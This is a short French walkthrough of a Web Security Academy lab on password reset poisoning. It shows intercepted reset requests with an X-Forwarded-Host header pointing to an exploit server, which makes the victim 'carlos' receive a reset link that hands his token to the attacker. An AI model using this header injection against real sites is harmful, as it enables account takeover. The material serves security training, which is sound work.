Empoisonnement du reset de mot de passe via un middleware

Password reset poisoning via middleware

Lab: Password reset poisoning via middleware | Web Security AcademyWebSecAcademy

Ce laboratoire est vulnérable à une attaque de password reset poisoning. L’utilisateur carlos clique systématiquement sur les liens contenus dans les emails qu’il reçoit.

Objectif final : accéder au compte de carlos.

Identifiants valides :
- wiener:peter
Les emails envoyés à notre compte sont consultables via le client mail du serveur d’exploit.

La fonctionnalité de réinitialisation de mot de passe est accessible et permet de saisir un nom d’utilisateur.

Lorsque l’on initie une demande de reset avec notre propre compte (wiener), un email est envoyé contenant un lien de ce type :

https://0a45005104c7f2228168b62400a90036.web-security-academy.net/forgot-password?temp-forgot-password-token=wadsb5f13habt0byz2ifrf68srpga96p

Ce lien redirige vers une page permettant de définir un nouveau mot de passe à l’aide d’un token temporaire.

Test de manipulation via Burp Suite

En interceptant la requête de reset de mot de passe avec Burp Suite, on ajoute l’en-tête HTTP suivant :

X-Forwarded-Host: test.com



username=wiener

L’email reçu contient toujours le token valide, mais l’URL pointe désormais vers test.com.

Cela indique que l’application fait confiance à l’en-tête X-Forwarded-Host pour générer le lien de reset.

X-Forwarded-Host: exploit-0af100e80420f2c381b0b5a301a8008c.exploit-server.net

username=carlos

Exploitation sur la victime

On répète l’attaque, cette fois en ciblant carlos et en utilisant l’URL du serveur d’exploit

Un email est envoyé à carlos contenant un lien de reset hébergé sur notre serveur d’exploit, avec un token valide :

/forgot-password?temp-forgot-password-token=r5jf8u0c48zh54pgoqx8jol619pboi3i

Mis à jour il y a 2 mois

hashtagPassword reset poisoning via middleware

Password reset poisoning via middleware